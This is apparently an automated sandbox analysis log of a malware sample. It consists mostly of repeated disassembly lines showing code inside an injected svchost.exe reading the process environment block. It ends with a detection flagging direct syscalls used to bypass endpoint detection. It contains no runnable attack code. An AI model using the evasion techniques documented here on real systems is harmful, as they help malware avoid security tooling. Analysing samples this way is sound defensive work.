                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E443 mov eax, dword ptr fs:[00000030h]4_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A430 mov eax, dword ptr fs:[00000030h]4_2_02F6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E420 mov eax, dword ptr fs:[00000030h]4_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E420 mov eax, dword ptr fs:[00000030h]4_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2E420 mov eax, dword ptr fs:[00000030h]4_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2C427 mov eax, dword ptr fs:[00000030h]4_2_02F2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB6420 mov eax, dword ptr fs:[00000030h]4_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68402 mov eax, dword ptr fs:[00000030h]4_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68402 mov eax, dword ptr fs:[00000030h]4_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68402 mov eax, dword ptr fs:[00000030h]4_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]4_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F325E0 mov eax, dword ptr fs:[00000030h]4_2_02F325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C5ED mov eax, dword ptr fs:[00000030h]4_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C5ED mov eax, dword ptr fs:[00000030h]4_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F365D0 mov eax, dword ptr fs:[00000030h]4_2_02F365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]4_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]4_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E5CF mov eax, dword ptr fs:[00000030h]4_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E5CF mov eax, dword ptr fs:[00000030h]4_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F545B1 mov eax, dword ptr fs:[00000030h]4_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F545B1 mov eax, dword ptr fs:[00000030h]4_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB05A7 mov eax, dword ptr fs:[00000030h]4_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB05A7 mov eax, dword ptr fs:[00000030h]4_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB05A7 mov eax, dword ptr fs:[00000030h]4_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6E59C mov eax, dword ptr fs:[00000030h]4_2_02F6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F32582 mov eax, dword ptr fs:[00000030h]4_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F32582 mov ecx, dword ptr fs:[00000030h]4_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F64588 mov eax, dword ptr fs:[00000030h]4_2_02F64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6656A mov eax, dword ptr fs:[00000030h]4_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6656A mov eax, dword ptr fs:[00000030h]4_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6656A mov eax, dword ptr fs:[00000030h]4_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38550 mov eax, dword ptr fs:[00000030h]4_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38550 mov eax, dword ptr fs:[00000030h]4_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40535 mov eax, dword ptr fs:[00000030h]4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40535 mov eax, dword ptr fs:[00000030h]4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40535 mov eax, dword ptr fs:[00000030h]4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40535 mov eax, dword ptr fs:[00000030h]4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40535 mov eax, dword ptr fs:[00000030h]4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40535 mov eax, dword ptr fs:[00000030h]4_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E53E mov eax, dword ptr fs:[00000030h]4_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E53E mov eax, dword ptr fs:[00000030h]4_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E53E mov eax, dword ptr fs:[00000030h]4_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E53E mov eax, dword ptr fs:[00000030h]4_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E53E mov eax, dword ptr fs:[00000030h]4_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6500 mov eax, dword ptr fs:[00000030h]4_2_02FC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004B00 mov eax, dword ptr fs:[00000030h]4_2_03004B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6AAEE mov eax, dword ptr fs:[00000030h]4_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6AAEE mov eax, dword ptr fs:[00000030h]4_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30AD0 mov eax, dword ptr fs:[00000030h]4_2_02F30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F64AD0 mov eax, dword ptr fs:[00000030h]4_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F64AD0 mov eax, dword ptr fs:[00000030h]4_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F86ACC mov eax, dword ptr fs:[00000030h]4_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F86ACC mov eax, dword ptr fs:[00000030h]4_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F86ACC mov eax, dword ptr fs:[00000030h]4_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38AA0 mov eax, dword ptr fs:[00000030h]4_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38AA0 mov eax, dword ptr fs:[00000030h]4_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03002B57 mov eax, dword ptr fs:[00000030h]4_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03002B57 mov eax, dword ptr fs:[00000030h]4_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03002B57 mov eax, dword ptr fs:[00000030h]4_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03002B57 mov eax, dword ptr fs:[00000030h]4_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F86AA4 mov eax, dword ptr fs:[00000030h]4_2_02F86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F68A90 mov edx, dword ptr fs:[00000030h]4_2_02F68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3EA80 mov eax, dword ptr fs:[00000030h]4_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FACA72 mov eax, dword ptr fs:[00000030h]4_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FACA72 mov eax, dword ptr fs:[00000030h]4_2_02FACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6CA6F mov eax, dword ptr fs:[00000030h]4_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6CA6F mov eax, dword ptr fs:[00000030h]4_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6CA6F mov eax, dword ptr fs:[00000030h]4_2_02F6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDEA60 mov eax, dword ptr fs:[00000030h]4_2_02FDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F36A50 mov eax, dword ptr fs:[00000030h]4_2_02F36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40A5B mov eax, dword ptr fs:[00000030h]4_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40A5B mov eax, dword ptr fs:[00000030h]4_2_02F40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F54A35 mov eax, dword ptr fs:[00000030h]4_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F54A35 mov eax, dword ptr fs:[00000030h]4_2_02F54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6CA38 mov eax, dword ptr fs:[00000030h]4_2_02F6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6CA24 mov eax, dword ptr fs:[00000030h]4_2_02F6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5EA2E mov eax, dword ptr fs:[00000030h]4_2_02F5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBCA11 mov eax, dword ptr fs:[00000030h]4_2_02FBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38BF0 mov eax, dword ptr fs:[00000030h]4_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38BF0 mov eax, dword ptr fs:[00000030h]4_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F38BF0 mov eax, dword ptr fs:[00000030h]4_2_02F38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5EBFC mov eax, dword ptr fs:[00000030h]4_2_02F5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]4_2_02FBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]4_2_02FDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F50BCB mov eax, dword ptr fs:[00000030h]4_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F50BCB mov eax, dword ptr fs:[00000030h]4_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F50BCB mov eax, dword ptr fs:[00000030h]4_2_02F50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30BCD mov eax, dword ptr fs:[00000030h]4_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30BCD mov eax, dword ptr fs:[00000030h]4_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30BCD mov eax, dword ptr fs:[00000030h]4_2_02F30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40BBE mov eax, dword ptr fs:[00000030h]4_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F40BBE mov eax, dword ptr fs:[00000030h]4_2_02F40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]4_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]4_2_02FE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004A80 mov eax, dword ptr fs:[00000030h]4_2_03004A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F2CB7E mov eax, dword ptr fs:[00000030h]4_2_02F2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F28B50 mov eax, dword ptr fs:[00000030h]4_2_02F28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FDEB50 mov eax, dword ptr fs:[00000030h]4_2_02FDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE4B4B mov eax, dword ptr fs:[00000030h]4_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FE4B4B mov eax, dword ptr fs:[00000030h]4_2_02FE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6B40 mov eax, dword ptr fs:[00000030h]4_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6B40 mov eax, dword ptr fs:[00000030h]4_2_02FC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD8B42 mov eax, dword ptr fs:[00000030h]4_2_02FD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFAB40 mov eax, dword ptr fs:[00000030h]4_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5EB20 mov eax, dword ptr fs:[00000030h]4_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5EB20 mov eax, dword ptr fs:[00000030h]4_2_02F5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF8B28 mov eax, dword ptr fs:[00000030h]4_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FF8B28 mov eax, dword ptr fs:[00000030h]4_2_02FF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FAEB1D mov eax, dword ptr fs:[00000030h]4_2_02FAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]4_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]4_2_02F6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]4_2_02FFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]4_2_02F5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03004940 mov eax, dword ptr fs:[00000030h]4_2_03004940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBC89D mov eax, dword ptr fs:[00000030h]4_2_02FBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F30887 mov eax, dword ptr fs:[00000030h]4_2_02F30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE872 mov eax, dword ptr fs:[00000030h]4_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE872 mov eax, dword ptr fs:[00000030h]4_2_02FBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6870 mov eax, dword ptr fs:[00000030h]4_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC6870 mov eax, dword ptr fs:[00000030h]4_2_02FC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F60854 mov eax, dword ptr fs:[00000030h]4_2_02F60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34859 mov eax, dword ptr fs:[00000030h]4_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F34859 mov eax, dword ptr fs:[00000030h]4_2_02F34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F42840 mov ecx, dword ptr fs:[00000030h]4_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52835 mov eax, dword ptr fs:[00000030h]4_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52835 mov eax, dword ptr fs:[00000030h]4_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52835 mov eax, dword ptr fs:[00000030h]4_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52835 mov ecx, dword ptr fs:[00000030h]4_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52835 mov eax, dword ptr fs:[00000030h]4_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F52835 mov eax, dword ptr fs:[00000030h]4_2_02F52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F6A830 mov eax, dword ptr fs:[00000030h]4_2_02F6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD483A mov eax, dword ptr fs:[00000030h]4_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD483A mov eax, dword ptr fs:[00000030h]4_2_02FD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBC810 mov eax, dword ptr fs:[00000030h]4_2_02FBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F629F9 mov eax, dword ptr fs:[00000030h]4_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F629F9 mov eax, dword ptr fs:[00000030h]4_2_02F629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]4_2_02FBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]4_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]4_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]4_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]4_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]4_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]4_2_02F3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F649D0 mov eax, dword ptr fs:[00000030h]4_2_02F649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]4_2_02FFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FC69C0 mov eax, dword ptr fs:[00000030h]4_2_02FC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB89B3 mov esi, dword ptr fs:[00000030h]4_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB89B3 mov eax, dword ptr fs:[00000030h]4_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FB89B3 mov eax, dword ptr fs:[00000030h]4_2_02FB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F429A0 mov eax, dword ptr fs:[00000030h]4_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F309AD mov eax, dword ptr fs:[00000030h]4_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F309AD mov eax, dword ptr fs:[00000030h]4_2_02F309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD4978 mov eax, dword ptr fs:[00000030h]4_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FD4978 mov eax, dword ptr fs:[00000030h]4_2_02FD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02FBC97C mov eax, dword ptr fs:[00000030h]4_2_02FBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F56962 mov eax, dword ptr fs:[00000030h]4_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_02F56962 mov eax, dword ptr fs:[00000030h]4_2_02F56962
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_003981D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_003981D4
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036A2A4 SetUnhandledExceptionFilter,2_2_0036A2A4
                Source: C:\Users\user\Desktop\RO2Y11yOJ7.exeCode function: 2_2_0036A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0036A2D5

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
